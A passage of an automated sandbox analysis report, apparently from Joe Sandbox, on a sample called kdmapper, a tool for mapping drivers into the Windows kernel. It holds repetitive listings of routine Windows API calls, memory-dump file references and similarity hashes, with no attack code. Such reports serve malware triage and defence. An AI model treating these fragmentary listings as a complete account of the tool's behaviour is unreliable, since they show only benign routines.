                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DloadProtectSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2203082970-0
                                                                                                                                                                                                              • Opcode ID: 230f975436c3a1c9c41ed8db6658fc99f6c5050b0a51e193e278bf49eca7cbd9
                                                                                                                                                                                                              • Instruction ID: afc30a87d97a1ea1240a0145112dffe08789fdac4e25fae0a07f91321c6e7f12
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 230f975436c3a1c9c41ed8db6658fc99f6c5050b0a51e193e278bf49eca7cbd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FD0A9B42C83488ECA09FBA9AC827343350B320741F97C081B344E62B1CA6080C9C631
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00DF1B3E), ref: 00DFDD92
                                                                                                                                                                                                                • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                                                                                                                                                                • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                                                                                                                                                                • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
                                                                                                                                                                                                                • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                                                                                                                                                                • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 897784432-0
                                                                                                                                                                                                              • Opcode ID: 7901f99baf8bd1d08f4e6cc7e7d074b4baa23eb7da9d6e62f46628ab3e148751
                                                                                                                                                                                                              • Instruction ID: 15ad23f29b84bea8221dec06d691a658e336c2612f927852867edd2b286b7b45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7901f99baf8bd1d08f4e6cc7e7d074b4baa23eb7da9d6e62f46628ab3e148751
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD09E31144300BFD6112B52CE06F1A7AA2EB98B04F004555B384740B2C6729D21DB25
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNELBASE(000000FF,00DE97BE), ref: 00DE98C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileType
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3081899298-0
                                                                                                                                                                                                              • Opcode ID: ed86f761750f741caac4339a1b9c156e9e84afe0ce15ba373232fc8d0c46698c
                                                                                                                                                                                                              • Instruction ID: 23cc47e37982469721e39b2342948891bb3dc47cad441b19c6c22b7f77554f3b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed86f761750f741caac4339a1b9c156e9e84afe0ce15ba373232fc8d0c46698c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECC01234401145898E206A3698940D9F311AB933657B88795C028850B1C322CC47EA21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 9d9de2a872ee66dee440250dc1b9184d967a51bf2e9a00cccd53dc1c2d7f9eed
                                                                                                                                                                                                              • Instruction ID: 0de14c77d32587533d9745899fcda72a4d3fa9f6a96be1f82a478871a139a405
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d9de2a872ee66dee440250dc1b9184d967a51bf2e9a00cccd53dc1c2d7f9eed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8B012E5299344BD311421562C03C37030DC0C1B20331D43EFD02E0491D840EC400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 6b410f49d71b52e10912961d9867f7f0a10c1555179c0a54b8d9303186d02709
                                                                                                                                                                                                              • Instruction ID: cee6440cfef75653526211d8785bf38c3672e6fa98b9ae130334a8fdaca2e1d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b410f49d71b52e10912961d9867f7f0a10c1555179c0a54b8d9303186d02709
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94B012E1299344AC311466162C03C37034DC0C1B20331D13EFD06D0290D840EC440471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 3b268c08203014319f3d9d4e9fe24458420bf2b0b3eb4e2c0d475e3af59c24a0
                                                                                                                                                                                                              • Instruction ID: 8fc19168747eefd24798642f085694087d89a2507cc302be792de802f2d66cfa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b268c08203014319f3d9d4e9fe24458420bf2b0b3eb4e2c0d475e3af59c24a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39B012E529D308AD3114615A2C03C37030DC0C0B20331D03EF906D0191D840AC400571
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFEAF9
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 3bf66f76e2ecb8a75c13f962722fc017f32ba42355c79af7c219b995eeb93c47
                                                                                                                                                                                                              • Instruction ID: aa68d9f016eff94e9e335cd6f491566a8cb654f087a3070c5915212897ea3c49
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bf66f76e2ecb8a75c13f962722fc017f32ba42355c79af7c219b995eeb93c47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57B012D62DA3C67C320472502D03C37830CC1C0FE0331E12FF601E40A1DC804C410471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 9b355e6145213f5dda6e7279b2f53c1c1fdf53501f636c392bacb51d5f213063
                                                                                                                                                                                                              • Instruction ID: 5aa4b14dc8f7523d8d5f1eeb7e8d9fc7c2d1ab57d9382b367289a228d0876866
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b355e6145213f5dda6e7279b2f53c1c1fdf53501f636c392bacb51d5f213063
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66B012F1299304AC312461162D03C37438DC0C0B20331D03EF906E0190DC40AD410471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 6458c562476fbdf23a456502308b27175b4b57712a8a744b2ef808f7b56bc85a
                                                                                                                                                                                                              • Instruction ID: de956191ad7b4370edc3d3f9d2caea9e7371b9fae8258d5b8103edd3d47f45f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6458c562476fbdf23a456502308b27175b4b57712a8a744b2ef808f7b56bc85a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66B012F129A344BC315462162C03C37430EC1C0B20331D13EF906D0190D840AC840471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 48c3e06ed106e7ff0502b9dfad820f42460adaed74093387f9b3f75e222658e5
                                                                                                                                                                                                              • Instruction ID: 97d37b8fb4c09b20e1293486364986de30ef2fe68af9f5ab34dc9c72412388bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48c3e06ed106e7ff0502b9dfad820f42460adaed74093387f9b3f75e222658e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FB012E129A384AC311461162C03C37430EC1C1B20331D03EFD06D0190D840EC400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 5d6192885fc37e2e82e9232f4a3b77432c08c2916954b7e28d5c3f45acc0cb37
                                                                                                                                                                                                              • Instruction ID: e20898d37f7f8c98857d68800dc86090a68b4643de7be9444b3f237c31de97ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d6192885fc37e2e82e9232f4a3b77432c08c2916954b7e28d5c3f45acc0cb37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64B012E5299344AC312461262C03C37034DC0C1B20331D03EFE06E0190D840EC400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 1168598634ba50990513695868dc9ea34249863edb96bbe5a21ea9a531aa5e3a
                                                                                                                                                                                                              • Instruction ID: 889a4ca7c4bd5361f4d3e4a2fd5cd6fa83c6c0fb0e19af15ee2dba9a5b12769b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1168598634ba50990513695868dc9ea34249863edb96bbe5a21ea9a531aa5e3a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FB012E12AA344AC311461162C03C37434EC5C0B20331D03EF907D0190D840AC400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: fd286f318e49c0e138d5803a079f213ddf548188f7049619b48a8a542c8c3123
                                                                                                                                                                                                              • Instruction ID: ab943779499fc474109054fb3359a991290fbb303154d4227dc7bf3fc812595b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd286f318e49c0e138d5803a079f213ddf548188f7049619b48a8a542c8c3123
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FB012F1299344BC311461172C03C37030DC0C1F20331D13EFD06D0190D840ED400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
